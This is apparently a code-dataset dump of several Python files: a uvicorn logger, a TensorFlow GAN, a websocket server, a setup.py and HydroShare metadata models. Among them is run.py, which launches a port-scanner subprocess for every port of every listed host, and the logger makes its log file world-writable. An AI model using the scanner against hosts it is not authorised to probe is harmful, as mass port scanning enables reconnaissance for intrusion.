"call"}, {"api_name": "wry.data_structures.WryDict", "line_number": 110, "usage_type": "call"}, {"api_name": "wry.config.RESOURCE_URIs", "line_number": 126, "usage_type": "name"}, {"api_name": "wry.data_structures.WryDict", "line_number": 129, "usage_type": "call"}, {"api_name": "wry.data_structures.WryDict", "line_number": 134, "usage_type": "call"}, {"api_name": "xml.etree", "line_number": 138, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 138, "usage_type": "call"}, {"api_name": "xml.etree", "line_number": 139, "usage_type": "argument"}, {"api_name": "wry.config.RESOURCE_URIs", "line_number": 139, "usage_type": "name"}, {"api_name": "wry.data_structures.WryDict", "line_number": 140, "usage_type": "call"}, {"api_name": "wry.exceptions.NonZeroReturn", "line_number": 143, "usage_type": "call"}, {"api_name": "wry.exceptions", "line_number": 143, "usage_type": "name"}]} +{"seq_id": "348402502", "text": "import logging\nimport uvicorn\nimport pathlib\n\n\nclass logger_class:\n def __init__(self):\n self.logfile = \"test.log\"\n self.logger = logging.getLogger(\"uvicorn.access\")\n self.setup_loging()\n\n def setup_loging(self):\n logger = logging.getLogger(\"uvicorn.access\")\n console_formatter = uvicorn.logging.ColourizedFormatter(\n \"{asctime} {levelprefix} : {message}\",\n style=\"{\", use_colors=True)\n logger.handlers[0].setFormatter(console_formatter)\n logfile = pathlib.Path(self.logfile)\n logfile.touch()\n logfile.chmod(0o666)\n handler = logging.FileHandler(filename=self.logfile)\n handler.setFormatter(logging.Formatter(\n \"%(asctime)s %(levelname)8s : %(message)s\"))\n handler.setLevel(logging.WARN)\n logger.addHandler(handler)\n\n logger = logging.getLogger(\"uvicorn\")\n console_formatter = uvicorn.logging.ColourizedFormatter(\n \"{asctime} {levelprefix} : {message}\",\n style=\"{\", use_colors=True)\n logger.handlers[0].setFormatter(console_formatter)\n\n def error(self, message):\n self.logger.error(message)\n\n def info(self, message):\n self.logger.info(message)\n\n def debug(self, message):\n self.logger.debug(message)\n\n def warning(self, message):\n self.logger.warning(message)\n\n\nlogger = logger_class()\n", "sub_path": "app/internal/module/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 1400, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "uvicorn.logging.ColourizedFormatter", "line_number": 14, "usage_type": "call"}, {"api_name": "uvicorn.logging", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.WARN", "line_number": 24, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "uvicorn.logging.ColourizedFormatter", "line_number": 28, "usage_type": "call"}, {"api_name": "uvicorn.logging", "line_number": 28, "usage_type": "attribute"}]} +{"seq_id": "451903719", "text": "# -*- coding:UTF-8 -*-\r\n#*********************************************\r\n#------->>>>>>Author:秋某人的傻逼 *\r\n#------->>>>>>Name:熊猫最爱皮卡丘 *\r\n#------->>>>>>Target:端口实时监控工具 *\r\n#*********************************************\r\n\r\n\r\n#--------------------/工具编写思路/--------------------\r\n#1.开始并发\r\n#--------------------/工具编写思路/--------------------\r\n\r\n\r\nimport os\r\nimport glob\r\nimport datetime\r\nimport subprocess\r\n\r\nprint('---------------------------------------------')\r\nprint('欢迎使用端口实时监控工具,本工具版本号:V3.0')\r\nprint('---------------------------------------------')\r\n# ip伪线程设置\r\nprint('本软件默认开启所有IP并发扫描!请控制IP数量或者升级服务器配置以免宕机')\r\nprint('支持线程是:1、3、5、15、17、51、85、255、257、771、1285、3855、4369、13107、21845,请不要输入错误!')\r\nthread = input('请输入端口扫描线程:')\r\nthread = int(thread)\r\n# 可以被整除:1、3、5、15、17、51、85、255、257、771、1285、3855、4369、13107、21845。\r\n# ------------------------\r\n# ip伪并发,65535切分模块\r\n# ------------------------\r\ndef ip_ct(thread):\r\n print('INFO: The Thread is ' + str(thread))\r\n Number = int(65535 / thread)\r\n print(Number)\r\n i = 1\r\n dirpath = 'ports/'\r\n # 判断路径是否存在,然后判断文件是否存在,如果存在就将文件删除,如果路径不存在就创建目录\r\n if os.path.exists('ports'):\r\n if os.listdir('ports'):\r\n print('文件夹Ports已经存在,正在对文件进行清空...')\r\n for file in os.walk('ports'):\r\n print('os.walk返回对象' + str(file))\r\n for items in file[2]:\r\n print('目标文件:' + items)\r\n os.remove(dirpath + items)\r\n print(items + '| 文件已删除')\r\n else:\r\n print('Ports目录已存在,且无文件!')\r\n else:\r\n os.mkdir('ports')\r\n print('Ports目录生成成功!')\r\n # 根据输入的port线程数目,然后对65535进行分割,然后生成文件,对文件进行列目录\r\n while i <= thread:\r\n count_original = Number * (i - 1)\r\n count = Number * i\r\n print('当前是生成第' + str(i) + '个线程')\r\n for port in range(count_original, count):\r\n with open('ports/port_' + str(i) + '.txt', 'a+') as f:\r\n f.write(str(port))\r\n f.write('\\n')\r\n f.close()\r\n i += 1\r\n for filename in glob.glob(r'ports/*.txt'):\r\n print('文件:' + filename + '| 生成成功!')\r\n print('IP线程预分类模块完成!')\r\n #创建目录模块\r\ndef mkdir():\r\n now = datetime.datetime.now()\r\n path = 'portscan_results/' + str(now.year) + '-' + str(now.month) + '-' + str(now.day)\r\n # 去除首位空格\r\n # path = path.strip()\r\n # 去除尾部 \\ 符号\r\n # path = path.rstrip(\"\\\\\")\r\n isExists = os.path.exists(path)\r\n # 判断结果\r\n if not isExists:\r\n os.makedirs(path)\r\n print(path + ' 创建成功')\r\n return True\r\n else:\r\n print(path + ' 目录已存在')\r\n return False\r\nip_ct(thread)\r\nmkdir()\r\n\r\nfor ip in open('hosts.txt','r'):\r\n listfile = os.listdir('ports')\r\n len_listfile = len(listfile)\r\n for x in range(0,len_listfile):\r\n for port in open('ports/'+ listfile[x],'r'):\r\n subprocess.Popen(\"python ./Real_Time_Port_Scaner.py \" + ip + port)", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3613, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 41, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 45, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 50, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 77, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 87, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "137228570", "text": "from websocket_server import WebsocketServer, WebsocketClientBehavior\n\n# Called for every client connecting (after handshake)\ndef new_client(client, server):\n print(\"New client connected and was given id %d\" % client.id)\n server.send_message_to_all(\"Hey all, a new client has joined us\")\n\n# Called for every client disconnecting\ndef client_left(client, server):\n\tprint(\"Client(%d) disconnected\" % client.id)\n\n# Called when a client sends a message but overriden)\ndef message_received(client, server, message):\n\tif len(message) > 200:\n\t\tmessage = message[:200]+'..'\n\tprint(\"Client(%d) from %s said: %s\" % (client.id, client.origin, message))\n\n\n\nclass hdrBhv(WebsocketClientBehavior):\n '''\n Set a different behavior\n '''\n def on_text(self, msg):\n '''\n if the text sent through msg is in the request headers\n respond with that header.\n '''\n if msg in self.handler.headers:\n self.send_text(self.handler.headers[msg]);\n else:\n print('Client(%d) from %s said: %s' % (self.id, self.origin, msg));\n # on_text and on_open keeps with the same behavior\n\nclass revBhv(WebsocketClientBehavior):\n '''\n Set a different behavior\n '''\n def on_text(self, msg):\n '''\n if the text sent through msg is in the request headers\n respond with that header.\n '''\n self.send_text('.'.join(msg[::-1]));\n # on_text and on_open keeps with the same behavior\n\nPORT=9001\nserver = WebsocketServer(PORT)\n# override the default behavior for clients connection to ws://host:PORT/hdr\nserver.behaviors['/headers'] = hdrBhv;\nserver.behaviors['/reverse'] = revBhv;\n\n# default handlers, will be called if the connect to the server with a different address\nserver.set_fn_new_client(new_client)\nserver.set_fn_client_left(client_left)\nserver.set_fn_message_received(message_received)\nserver.run_forever()\n", "sub_path": "examples/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 1826, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "websocket_server.WebsocketClientBehavior", "line_number": 20, "usage_type": "name"}, {"api_name": "websocket_server.WebsocketClientBehavior", "line_number": 35, "usage_type": "name"}, {"api_name": "websocket_server.WebsocketServer", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "130497964", "text": "import tensorflow as tf\nimport input_data\nimport numpy as np\nfrom PIL import Image\n\nbatch_size = 64\nz_dim = 100\nlearning_rate = 0.001\nbeta1 = 0.5\nepochs = 5000\n\n\ndef model_inputs(image_width, image_height, image_channels, z_dim):\n # Real imag\n inputs_real = tf.placeholder(tf.float32, (None, image_width, image_height, image_channels), name='input_real')\n\n # input z\n\n inputs_z = tf.placeholder(tf.float32, (None, z_dim), name='input_z')\n\n # Learning rate\n learning_rate = tf.placeholder(tf.float32, name='lr')\n\n return inputs_real, inputs_z, learning_rate\n\n\ndef generator(input_z, out_channel_dim, is_train=True):\n with tf.variable_scope('generator', reuse=not is_train):\n x0 = tf.layers.dense(input_z, 4 * 4 * 512)\n x0 = tf.reshape(x0, (-1, 4, 4, 512))\n bn0 = tf.layers.batch_normalization(x0, training=is_train)\n relu0 = tf.nn.relu(bn0)\n\n # 反卷积\n x1 = tf.layers.conv2d_transpose(relu0, 256, 4, strides=1, padding='valid')\n bn1 = tf.layers.batch_normalization(x1, training=is_train)\n relu1 = tf.nn.relu(bn1)\n\n x2 = tf.layers.conv2d_transpose(relu1, 512, 3, strides=2, padding='same')\n bn2 = tf.layers.batch_normalization(x2, training=is_train)\n relu2 = tf.nn.relu(bn2)\n\n logits = tf.layers.conv2d_transpose(relu2, out_channel_dim, 3, strides=2, padding='same')\n out = tf.tanh(logits)\n\n return out\n\n\ndef discriminator(images, reuse=False):\n \"\"\"\n Create the discriminator network\n :param images: Tensor of input image(s)\n :param reuse: Boolean if the weights should be reused\n :return: Tuple of (tensor output of the discriminator, tensor logits of the discriminator)\n \"\"\"\n # TODO: Implement Function\n\n # scope here\n\n with tf.variable_scope('discriminator', reuse=reuse):\n alpha = 0.2 # leak relu coeff\n\n # drop out probability\n keep_prob = 0.8\n\n # input layer 28 * 28 * color channel\n x1 = tf.layers.conv2d(images, 128, 5, strides=2, padding='same',\n kernel_initializer=tf.contrib.layers.xavier_initializer(seed=2))\n # No batch norm here\n # leak relu here / alpha = 0.2\n relu1 = tf.maximum(alpha * x1, x1)\n # applied drop out here\n drop1 = tf.nn.dropout(relu1, keep_prob=keep_prob)\n # 14 * 14 * 128\n\n # Layer 2\n x2 = tf.layers.conv2d(drop1, 256, 5, strides=2, padding='same',\n kernel_initializer=tf.contrib.layers.xavier_initializer(seed=2))\n # employ batch norm here\n bn2 = tf.layers.batch_normalization(x2, training=True)\n # leak relu\n relu2 = tf.maximum(alpha * bn2, bn2)\n drop2 = tf.nn.dropout(relu2, keep_prob=keep_prob)\n\n # 7 * 7 * 256\n\n # Layer3\n x3 = tf.layers.conv2d(drop2, 512, 5, strides=2, padding='same',\n kernel_initializer=tf.contrib.layers.xavier_initializer(seed=2))\n bn3 = tf.layers.batch_normalization(x3, training=True)\n relu3 = tf.maximum(alpha * bn3, bn3)\n drop3 = tf.nn.dropout(relu3, keep_prob=keep_prob)\n # 4 * 4 * 512\n\n # Output\n # Flatten\n flatten = tf.reshape(relu3, (-1, 4 * 4 * 512))\n logits = tf.layers.dense(flatten, 1)\n # activation\n out = tf.nn.sigmoid(logits)\n\n return out, logits\n\n\ndef model_loss(input_real, input_z, out_channel_dim):\n \"\"\"\n Get the loss for the discriminator and generator\n :param input_real: Images from the real dataset\n :param input_z: Z input\n :param out_channel_dim: The number of channels in the output image\n :return: A tuple of (discriminator loss, generator loss)\n \"\"\"\n # TODO: Implement Function\n\n g_model = generator(input_z, out_channel_dim, is_train=True)\n\n g_model1 = generator(input_z, out_channel_dim, is_train=False)\n\n d_model_real, d_logits_real = discriminator(input_real, reuse=False)\n\n d_model_fake, d_logits_fake = discriminator(g_model, reuse=True)\n\n ## add smooth here\n\n smooth = 0.1\n d_loss_real = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_real,\n labels=tf.ones_like(d_model_real) * (1 - smooth)))\n\n d_loss_fake = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake, labels=tf.zeros_like(d_model_fake)))\n\n g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=d_logits_fake,\n labels=tf.ones_like(d_model_fake)))\n\n d_loss = d_loss_real + d_loss_fake\n\n return d_loss, g_loss, g_model1\n\n\ndef model_opt(d_loss, g_loss, learning_rate, beta1):\n \"\"\"\n Get optimization operations\n :param d_loss: Discriminator loss Tensor\n :param g_loss: Generator loss Tensor\n :param learning_rate: Learning Rate Placeholder\n :param beta1: The exponential decay rate for the 1st moment in the optimizer\n :return: A tuple of (discriminator training operation, generator training operation)\n \"\"\"\n\n t_vars = tf.trainable_variables()\n d_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n g_vars = [var for var in t_vars if var.name.startswith('generator')]\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n with tf.control_dependencies(update_ops):\n d_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(d_loss, var_list=d_vars)\n g_train_opt = tf.train.AdamOptimizer(learning_rate, beta1=beta1).minimize(g_loss, var_list=g_vars)\n\n return d_train_opt, g_train_opt\n\n\ndef train(epoch_count, batch_size, z_dim, learning_rate, beta1, data_shape):\n input_real, input_z, lr = model_inputs(data_shape[1], data_shape[2], data_shape[3], z_dim)\n d_loss, g_loss, g_out = model_loss(input_real, input_z, data_shape[-1])\n d_opt, g_opt = model_opt(d_loss, g_loss, learning_rate, beta1)\n steps = 0\n losses = []\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch_i in range(epoch_count):\n steps += 1\n batch = mnist.train.next_batch(batch_size)\n labels = batch[1]\n batch = batch[0]\n train_batch = []\n for index, label in enumerate(labels):\n if label[2] == 1:\n train_batch.append(batch[index])\n input_batch_size = len(train_batch)\n train_batch = np.array(train_batch)\n train_batch = np.reshape(train_batch, (-1, data_shape[1], data_shape[2], data_shape[3]))\n batch_z = np.random.uniform(-1, 1, size=(input_batch_size, z_dim))\n _ = sess.run(d_opt, feed_dict={input_real: train_batch, input_z: batch_z, lr: learning_rate})\n _ = sess.run(g_opt, feed_dict={input_real: train_batch, input_z: batch_z, lr: learning_rate})\n if steps % 10 == 0:\n train_loss_d = d_loss.eval({input_real: train_batch, input_z: batch_z})\n train_loss_g = g_loss.eval({input_real: train_batch, input_z: batch_z})\n\n losses.append((train_loss_d, train_loss_g))\n\n print(\"Epoch {}/{}...\".format(epoch_i + 1, epochs),\n \"Discriminator Loss: {:.4f}...\".format(train_loss_d),\n \"Generator Loss: {:.4f}\".format(train_loss_g))\n if steps % 100 == 0:\n img = g_out.eval({input_z: batch_z})\n img = img[-1] * 128 + 128\n img = img.astype(int)\n img = img[:, :, 0]\n im = Image.fromarray(img).convert('L')\n im.save(\"result_{}.png\".format(steps))\n # im.show()\n\n\nif __name__ == \"__main__\":\n train(epochs, batch_size, z_dim, learning_rate, beta1, [0, 28, 28, 1])\n", "sub_path": "GAN.py", "file_name": "GAN.py", "file_ext": "py", "file_size_in_byte": 7886, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tensorflow.placeholder", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.tanh", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.maximum", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 73, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.maximum", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.maximum", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.nn.dropout", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 92, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid_cross_entropy_with_logits", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 127, "usage_type": "attribute"}, {"api_name": "tensorflow.ones_like", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid_cross_entropy_with_logits", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 131, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros_like", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid_cross_entropy_with_logits", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tensorflow.ones_like", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.trainable_variables", "line_number": 152, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 156, "usage_type": "attribute"}, {"api_name": "tensorflow.control_dependencies", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 159, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 159, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 160, "usage_type": "attribute"}, {"api_name": "input_data.read_data_sets", "line_number": 171, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 172, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 203, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 203, "usage_type": "name"}]} +{"seq_id": "171770051", "text": "#\n# Copyright (c) 2013, Prometheus Research, LLC\n# Released under MIT license, see `LICENSE` for details.\n#\n\n\nfrom setuptools import setup, find_packages\n\n\nNAME = \"Cogs\"\nVERSION = \"0.4.4\"\nDESCRIPTION = \"\"\"Toolkit for developing command-line utilities in Python\"\"\"\nLONG_DESCRIPTION = open('README', 'r').read()\nAUTHOR = \"\"\"Kirill Simonov (Prometheus Research, LLC)\"\"\"\nAUTHOR_EMAIL = \"xi@resolvent.net\"\nLICENSE = \"MIT\"\nURL = \"https://github.com/prometheusresearch/cogs\"\nDOWNLOAD_URL = \"http://pypi.python.org/pypi/Cogs\"\nCLASSIFIERS = [\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Utilities\",\n]\nPACKAGES = find_packages('src')\nPACKAGE_DIR = {'': 'src'}\nNAMESPACE_PACKAGES = ['cogs']\nINSTALL_REQUIRES = ['setuptools', 'PyYAML']\nENTRY_POINTS = {\n 'console_scripts': [\n 'cogs = cogs.run:main',\n ],\n 'cogs.extensions': [],\n}\nUSE_2TO3 = True\n\n\nsetup(name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=LICENSE,\n url=URL,\n download_url=DOWNLOAD_URL,\n classifiers=CLASSIFIERS,\n packages=PACKAGES,\n package_dir=PACKAGE_DIR,\n namespace_packages=NAMESPACE_PACKAGES,\n install_requires=INSTALL_REQUIRES,\n entry_points=ENTRY_POINTS,\n use_2to3=USE_2TO3)\n\n\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1621, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "setuptools.find_packages", "line_number": 31, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "311162443", "text": "import json\n\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.contenttypes.fields import GenericRelation\n\nfrom mezzanine.pages.page_processors import processor_for\n\nfrom hs_core.models import BaseResource, ResourceManager\nfrom hs_core.models import resource_processor, CoreMetaData, AbstractMetaDataElement\nfrom hs_core.hydroshare.utils import get_resource_file_name_and_extension\n\n\n# Define original spatial coverage metadata info\nclass OriginalCoverage(AbstractMetaDataElement):\n PRO_STR_TYPES = (\n ('', '---------'),\n ('WKT String', 'WKT String'),\n ('Proj4 String', 'Proj4 String')\n )\n\n term = 'OriginalCoverage'\n \"\"\"\n _value field stores a json string. The content of the json as box coverage info\n _value = \"{'northlimit':northenmost coordinate value,\n 'eastlimit':easternmost coordinate value,\n 'southlimit':southernmost coordinate value,\n 'westlimit':westernmost coordinate value,\n 'units:units applying to 4 limits (north, east, south & east),\n 'projection': name of the projection (optional)}\"\n \"\"\"\n _value = models.CharField(max_length=1024, null=True)\n projection_string_type = models.CharField(max_length=20, choices=PRO_STR_TYPES, null=True)\n projection_string_text = models.TextField(null=True, blank=True)\n datum = models.CharField(max_length=300, blank=True)\n\n class Meta:\n # OriginalCoverage element is not repeatable\n unique_together = (\"content_type\", \"object_id\")\n\n @property\n def value(self):\n return json.loads(self._value)\n\n @classmethod\n def create(cls, **kwargs):\n \"\"\"\n The '_value' subelement needs special processing. (Check if the 'value' includes the\n required information and convert 'value' dict as Json string to be the '_value'\n subelement value.) The base class create() can't do it.\n\n :param kwargs: the 'value' in kwargs should be a dictionary\n the '_value' in kwargs is a serialized json string\n \"\"\"\n value_arg_dict = None\n if 'value' in kwargs:\n value_arg_dict = kwargs['value']\n elif '_value' in kwargs:\n value_arg_dict = json.loads(kwargs['_value'])\n\n if value_arg_dict:\n # check that all the required sub-elements exist and create new original coverage meta\n for value_item in ['units', 'northlimit', 'eastlimit', 'southlimit', 'westlimit']:\n if value_item not in value_arg_dict:\n raise ValidationError(\"For original coverage meta, one or more bounding \"\n \"box limits or 'units' is missing.\")\n\n value_dict = {k: v for k, v in value_arg_dict.iteritems()\n if k in ('units', 'northlimit', 'eastlimit', 'southlimit',\n 'westlimit', 'projection')}\n\n value_json = json.dumps(value_dict)\n if 'value' in kwargs:\n del kwargs['value']\n kwargs['_value'] = value_json\n return super(OriginalCoverage, cls).create(**kwargs)\n else:\n raise ValidationError('Coverage value is missing.')\n\n @classmethod\n def update(cls, element_id, **kwargs):\n \"\"\"\n The '_value' subelement needs special processing. (Convert 'value' dict as Json string\n to be the '_value' subelement value) and the base class update() can't do it.\n\n :param kwargs: the 'value' in kwargs should be a dictionary\n \"\"\"\n\n ori_cov = OriginalCoverage.objects.get(id=element_id)\n if 'value' in kwargs:\n value_dict = ori_cov.value\n\n for item_name in ('units', 'northlimit', 'eastlimit', 'southlimit',\n 'westlimit', 'projection'):\n if item_name in kwargs['value']:\n value_dict[item_name] = kwargs['value'][item_name]\n\n value_json = json.dumps(value_dict)\n del kwargs['value']\n kwargs['_value'] = value_json\n super(OriginalCoverage, cls).update(element_id, **kwargs)\n\n\n# Define netCDF variable metadata\nclass Variable(AbstractMetaDataElement):\n # variable types are defined in OGC enhanced_data_model_extension_standard\n # left is the given value stored in database right is the value for the drop down list\n VARIABLE_TYPES = (\n ('Char', 'Char'), # 8-bit byte that contains uninterpreted character data\n ('Byte', 'Byte'), # integer(8bit)\n ('Short', 'Short'), # signed integer (16bit)\n ('Int', 'Int'), # signed integer (32bit)\n ('Float', 'Float'), # floating point (32bit)\n ('Double', 'Double'), # floating point(64bit)\n ('Int64', 'Int64'), # integer(64bit)\n ('Unsigned Byte', 'Unsigned Byte'),\n ('Unsigned Short', 'Unsigned Short'),\n ('Unsigned Int', 'Unsigned Int'),\n ('Unsigned Int64', 'Unsigned Int64'),\n ('String', 'String'), # variable length character string\n ('User Defined Type', 'User Defined Type'), # compound, vlen, opaque, enum\n ('Unknown', 'Unknown')\n )\n term = 'Variable'\n # required variable attributes\n name = models.CharField(max_length=1000)\n unit = models.CharField(max_length=1000)\n type = models.CharField(max_length=1000, choices=VARIABLE_TYPES)\n shape = models.CharField(max_length=1000)\n # optional variable attributes\n descriptive_name = models.CharField(max_length=1000, null=True, blank=True,\n 